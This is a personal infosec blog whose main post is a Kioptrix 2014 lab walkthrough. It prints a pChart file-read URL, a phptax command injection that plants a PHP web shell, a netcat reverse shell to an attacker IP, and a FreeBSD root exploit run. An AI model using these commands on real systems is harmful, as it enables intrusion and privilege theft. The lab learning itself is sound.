About Graeme Robinson

My job is as a software tester with a bit of support, but I also know quite a bit about hardware because that's how I got into computers. I also like to climb rock in my spare time. This blog will mostly document my quest to get into the information security field. Probably with emphasis on webapp security.

Kioptrix 2014

My lab time in the PWK course labs ran out a while back and I wasn’t ready for the exam. I think I understand all the theory that I need, it just takes m e too long to PWN systems, so I decided to try a few Vulnhub VMs. This article has a list of 10 that I will be trying, the first of which is Kioptrix 2014.

There are already walkthroughs all over the web, so I don’t feel like I’m giving away any spoilers here. I’m mostly documenting it for my own notes, but of course it can be used for hints if you’re going to give it a try.

I wanted to run in in VirtualBox, which requires the use of the extra “kiop2014_fix.zip” file as wall as the VMDK from the main kiop2014.tar.bz2

After starting the VM, I had to find the system’s IP address, so I ran netdiscover and it was quickly found. To find the open ports and identify the services, I ran nmap:

root@kali:~# nmap [IP-REDACTED] -sV

Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-11 15:59 EDT
Nmap scan report for kioptrix2014.lan ([IP-REDACTED])
Host is up (0.00044s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 08:00:27:DC:55:1C (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.66 seconds

Opening a web browser on port 8080 shows a 403 forbidden error message. Nothing too interesting in the response. The page returned on port 80 is more interesting though… When rendered, it’s just a heading that says “It works!”, but the source includes a commented out <meta refresh> that would redirect the browser to http://[IP-REDACTED]/pChart2.1.3/examples/index.php.

Initially, I thought I could inject some PHP in here. For example if I went to the sandbox and  changed my chart title to -“.shell_exec(“whoami”).”- then clicked the “Show code” button, it showed me that one line of code that would run would be

$myPicture->drawText(350,25,"-".shell_exec("whoami")."-",$TextSettings);

but when I clicked “Render picture”, the title was-“.shell_exec(“whoami”).”-, so it must have escaped it somehow when it really made the picture. Damn.

Next thing to try is looking for a known exploit for pChart:

root@kali:~# searchsploit pchart
--------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | php/webapps/31173.txt
--------------------------------------------- ----------------------------------

That txt file suggests that I can read any file on the system that the account running apache can read using a maliciously crafted url, for example http://[IP-REDACTED]/examples/index.php?Action=View&Script=/etc/passwd

Interestingly, we can see how this exploit works by examining the first line of index.php, which can be seen by visiting http://[IP-REDACTED]/pChart2.1.3/examples/index.php?Action=View&Script=index.php , which is:

<?php if ( isset($_GET["Action"])) { $Script = $_GET["Script"]; highlight_file($Script); exit(); } ?>

. We don’t even really need a value set for “Action”; http://[IP-REDACTED]/pChart2.1.3/examples/index.php?Action&Script=index.php works just as well.

Anyway, there’s not much of great interest that this account can access, but perhaps we can find out why we are seeing a 403 forbidden response when we connect to port 8080…

The apache config file on FreeBSD is located in /usr/local/etc/apache2x/httpd.conf, (on this system, since it’s apache 2.2, we should replace the “x” with a “2”) so we’ll look at that with http://[IP-REDACTED]/pChart2.1.3/examples/index.php?Action&Script=/usr/local/etc/apache22/httpd.conf and at the bottom of the file is:

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

This tells us that port 8080 is serving files from /usr/local/www/apache22/data2, and that requests will only be allowed if the user agent starts with “Mozilla/4.0 Mozilla4_browser” . See https://httpd.apache.org/docs/2.4/mod/mod_setenvif.html and http://httpd.apache.org/docs/current/mod/mod_access_compat.html#allow for more details of how that works.

Changing our user agent to “Mozilla/4.0 Mozilla4_browser_NOT REALLY!” makes apache respond to our requests to port 80, and the response says that there is a directory called phptax. This shows us a very ugly and dated web application that I clicked around, but couldn’t find anything interesting, so I used searchsploit again:

root@kali:~# searchsploit phptax
------------------------------------------------------------------ ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------ ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Metasploit) | php/webapps/21833.rb
phptax 0.8 - Remote Code Execution | php/webapps/21665.txt
PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution | php/webapps/25849.txt
------------------------------------------------------------------ ----------------------------------

The second one looks interesting, it basically says that we can get remote code execution because user input is not sanitised before being used in php’s exec() function. I’ll confirm this works by writing a single line php backdoor file by visiting http://[IP-REDACTED]:8080/phptax/drawimage.php?pfilez=xxx;echo “<?php echo shell_exec(\$_GET[‘e’].’ 2>%261′);?>”>backdoor.php;&pdf=make in my browser, then http://[IP-REDACTED]:8080/backdoor.php?e=whoami to make sure it worked. It did, and now I can execute shell commands and see the output

It would be really nice to have a remote shell. I tried using “nc <IP> <PORT> -e /bin/sh”, but that didn’t work and “nc -h” showed why; -e is for specifying an IPsec policy (whatever that means) on this version of nc. We’ll have to try something else; I remember some time ago that I was able to use a named fifo pipe in order to get a shell with nc. This command worked for me to connect to a netcat listener:

mkfifo pipe;nc [IP ADDR] [PORT]<pipe|/bin/sh>pipe 2>pipe;rm pipe

Running “uname -r” tells us that we’re on a FreeBSD 9.0 system. Let’s try to get root. Back to searchsploit:

root@kali:~# searchsploit -t FreeBSD 9
------------------------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------- ----------------------------------
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 | multiple/dos/20810.c
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 | multiple/dos/20811.cpp
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 | windows/dos/20812.c
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 | multiple/dos/20813.c
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 | windows/dos/20814.c
FreeBSD 9.1 ftpd - Remote Denial of Service | freebsd/dos/24450.txt
FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation | bsd/local/3578.c
BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1. | unix/local/19203.c
FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation | freebsd/local/26368.c
FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit) | freebsd/local/26454.rb
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | freebsd/local/28718.c
FreeBSD/x86 - rev connect_ recv_ jmp_ return results Shellcode (90 bytes | freebsd_x86/shellcode/13265.c
FreeBSD/x86 - Rortbind Reverse 127.0.0.1:8000 /bin/sh Shellcode (89 byte | freebsd_x86/shellcode/13267.asm
------------------------------------------------------------------------- ----------------------------------

26368 looks promising, let’s send it to the remote machine. I ran this on my attacking machine:

searchsploit -m 26368;nc -vnlp 6666 <26368.c

then ran this on the remote system:

nc 192.168.23.120 6666 >26368.c

and after a few seconds, I hit CTRL+C to close the nc session. Not I have the exploit on the FreeBSD system, so I can compile it and run it:

gcc 26368.c -o 26368
./26368
whoami
root

We’ve got root! Inside root’s home directory is a nice txt file with some interesting information that we can read using cat

I recently learned that the guy that made this VM (Steven “loneferret” McElrea) passed away a couple of months ago. I’m grateful for the time he put into making this VM and my thoughts go out to his family.

I got a job at an information security company!

In a previous blog post, I said that I attended B-Sides London earlier this year. It turns out that was probably one of the best things I’ve done this year because, not only was it very enjoyable, but I ended up speaking to a quite a lot of people while I was there, including some people that worked at security companies that were recruiting and I ended up getting a job at a company that is well known in the infosec world.

It was about time I moved on from my previous position, and this is a real step up for me. I’ve been working there for a few weeks now and I’m really enjoying it, the work is fun and interesting, the working environment is brilliant. It’s just great to be working in a field that I’m interested in and be somewhere that cares about career progression.

New alternate emoji domain

This is not really security related, but it’s a bit of fun so I wrote a quick post.

I had heard that emoji domains are available from select TLDs, so I decided to buy one! I am now the proud owner of 💻☠.ws, which mirrors this site.

Now, if you go to grobinson.me and your browser supports emoji domains without displaying the punycode translation (xn--h4h3030o.ws) in the address bar, you will be redirected to the same page on 💻☠.ws thanks to this little piece of javascript.

Check your address bar now. You may already using the emoji domain without even knowing.

nc.exe v1.10 NT crashes when -e used and <323 bytes sent in a line

I’m currently working through the PWK course from offensive-security, hoping to get my OSCP certification. While following the course materials, I’ve got to a section that talks about methods of transferring binary files after you have a shell on a remote system.

One of the methods suggested is converting the file to text using exe2bat.exe to convert the file into a series of echo commands with redirection to a file that can be copy/pasted into the shell and finally running debug.exe to convert the file back into an exe. It’s a pretty well known method, detailed instructions can be found easily with google.

I hit a problem when working through this though… I created a bind shell using nc.exe (v1.10 NT) and when i connected to this and pasted in the lines from the bat file created by exe2bat.exe, the nc.exe process would crash. It turned out to be crashing when it got the 3rd line from the bat file. I thought this was strange, so I contacted offensive-security support and they confirmed my findings, but weren’t sure why and suggested I used a different method to get a remote shell, e.g. using msfvenom.

I have done some testing myself, and wrote a python script that tells me what it received and how long it was so that I could see in more detail what was going on. The script is:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/env python3
 
import sys
 
print('pypipe.py v0.1')
print('--------------', flush=True)
 
for idx, line in enumerate(sys.stdin):
    line = line.strip()
    print('# Received line {}. Length (bytes):{}'.format(
            str(idx).zfill(3),
            str(len(line)).zfill(3)),
        flush=True)

Binding this to port 80 on windows with

nc -nvlp 80 -e "py pypipe.py"

and then connecting with netcat on my other system makes any input get reported back to the remote system line by line, and i can see that the problem happens when a long line is sent. I could also tell that it accepted a line with 323 characters, but when i sent 324, it crashed.

I suspect I’m seeing the bug mentioned here and here.

So I’ve learned that I can’t use that version of nc.exe to send binary files that have been converted into long text strings. Different versions of nc probably don’t have this issue.

While this is a problem because it’s an exploitable bug, this is not much of a problem for transferring binary files because in real world secenarios because there won’t be nc.exe on the system unless I’ve already found a way of getting a binary file onto the system, but it’s something that did trip me up for a few hours while doing the PWK course.

Hack the Box

I recently came across Hack The Box and have been having fun pwning some of those machines using the techniques that I have learned in the free Metasploit Unleashed course. Metasploit really is a great tool, and even though I could have got some “user owns” without it, I found that once I had learned how to use things like msfvenom, it saved me having to write some of my own trivial scripts, which saved me time.

I’ve currently got 3 “System Owns” and 4 “User Owns”, which puts me on “Script Kiddie” status. I’m hoping to get a few more and move to a better status fairly quickly, if I can find the time to play around some more.

I especially like the way you have to hack the invite before you can gain access to any machines. It was probably the easiest part of any of the challenges I have attempted, but that might be because I’m pretty familiar with web technologies.

If you haven’t tried it out, I would encourage you to do so. The website is very polished, and there are quite a lot of machines to attack 🙂

B-Sides London 2017

I took a day off from work on Wednesday last week to go to B-Sides London, and had probably the best day this year! There were so many interesting talks and loads of great people to chat to (and potential job opportunities). I even won a wristband which game me access to the MWR sponsored afterparty with free drinks 🙂

The most entertaining talk by far was by @info_dox titled “A look at TR-06FAIL and other CPE Configuration Disasters”. Darren showed up with a pint in his hand and proceeded to tell us all about the problems with the Broadband Forum‘s protocols and their various implementations.

I came away with a bit of swag too, 3 T-Shirts, and a signed copy of “Breaking Into Information Security by Andy Gill (which reminds me, I must get in contact with him for the digital copy he promised me).

I’d like to say a big thank you to all the volunteers who made it such a great event. Hopefully in the future, I’ll be able to give something back by helping out at one of these events, or something similar.

I’ve signed up to the Penetration testing with Kali Linux Course (OSCP)

Last week I signed up for the PWK course from Offensive Security starting in mid June with the intentions of getting the OSCP certification. I booked 60 days of lab access; I hope that’s enough, but if I don’t manage to find enough free time in those 60 days, I should be able to book some time off work towards the end. Failing that, I can always buy more time in the labs if I really need it.

I’m interested to see how I’ll handle the 24 hour exam at the end. Sounds like a fun challenge, which I suppose if what the whole point is (as well as proving skills).

In the weeks before that course starts, I’m working my way through the Metasploit Unleashed course, also by Offensive Security. Looks like a great tool, from what I’ve learned about it so far.

Am I officially a white hat hacker now!?

A while ago, while developing a geocaching app for pebble smartwatches called “Watch Caching”, I noticed a bug that could have security implications, so I reported it to Pebble using the whitehat guidelines set out by theme

It took them a while, but they eventually got back to me and agreed that it was a security vulnerability and wanted to offer me a significant financial reward, as well as put me in the Pebble White Hat Hall of Fame

This also took a while to come to fruition, but they did hold true to their word and sent me the money, followed a few days later by my name being added to the Pebble White Hat Hall of Fame!

Developing and debugging my own apps on JailBroken iOS8.1 using XCode 6.1 without paying apple

A while back I used an app called JailCoder to enable me to run and debug my own apps on my jailbroken iPhone 5S without having to pay Apple for a full developer account. I’m still learning iOS development and I have nothing I want to submit to the app store, so I’m reluctant to pay the £100 that Apple wants to enable me to run my own code on my own device.

Given that XCode is free, and that £100 per year would gives me the ability to sell apps through the app store, I think it’s a bargain if you are actually planning to distribute apps, but for me just learning it seems a bit steep.

There don’t seem to be many tutorials out there telling you how to do this for iOS8.1 and XCode 6.1 (they are all a bit outdated), but this is what worked for me:

  1. On your Jailbroken device install AppSync Unified 5.2-1 (or later) from AngelXWind’s repo. Don’t use any other AppSync, and if you have others, be sure to remove them.
  2. Open /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/SDKSettings.plist and change AD_HOC_CODE_SIGNING_ALLOWED to YES. You may need to duplicate it to the desktop, change it, save it, then drag and drop back into the original folder because OS X let you edit the file in place.
  3. If XCode was running, restart XCode.
  4. Change your Project and Target settings to “Ad Hoc Code Sign” in Build Settings
  5. Tell XCode to run app on iPhone. At this point XCode will put app on your iDevice, but can’t debug because it can’t attach to the process. The app will start then close immediately. You can now manually start the app on the phone now though.
  6. To enable debugging: In your project select File>New File Property List and create a file called “Entitlements.plist”. Add “Can be debugged” or “get-task-allow” (both do the same thing) and set the value to YES.
  7. Now change your Project and Target Code Signing Entitlements (In Build Settings) to “Entitlements.plist” (you have to type it in).

Now XCode can run and debug the app. Good luck

Note that some poeple have issues because they have other appsyncs installed. Remove all other appsyncs and install AppSync Unified from http://cydia.angelxwind.net/ (you’ll have to add this repo to cydia)

Thanks to Karen and Linus for developing AppSync Unified.

This subreddit may be helpful

I have a Raspberry PI on the way

I ordered a Raspberry PI yesterday.

I used to have a server running at home which served files, recorded tv, provided VPN, but I moved into a small flat, and there’s not much room for a server, not that my fiancée would be happy with anyway!

The PI will give me a little server back again for the duration that I’m in this flat. I’m also looking at playing with xbmc and perhaps some pvr capabilities on it. Should be fun!